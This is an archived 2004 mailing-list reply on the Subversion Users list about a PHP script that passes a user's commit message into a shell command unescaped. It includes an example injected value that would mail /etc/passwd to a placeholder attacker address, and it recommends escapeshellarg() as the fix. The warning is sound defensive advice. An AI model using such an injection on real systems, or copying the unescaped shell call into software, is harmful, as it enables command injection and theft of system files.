Re: PHP hack under way
From: Florian Weimer <fw_at_deneb.enyo.de>
Date: 2004-02-14 12:10:08 CET
Brian W. Fitzpatrick wrote:
> > $response = `svn commit -m \"$message\"`;
> I don't know offhand, but I suspect that you may be opening up a
With magic_quotes_gpc, this doesn't work, but
$(mail evilhaxor@example.com < /etc/passwd)
probably does...
You could use escapeshellarg() and similar functions to preprocess the
---------------------------------------------------------------------
|
This is an archived mail posted to the Subversion Users mailing list.
This site is subject to the Apache Privacy Policy and the Apache Public Forum Archive Policy.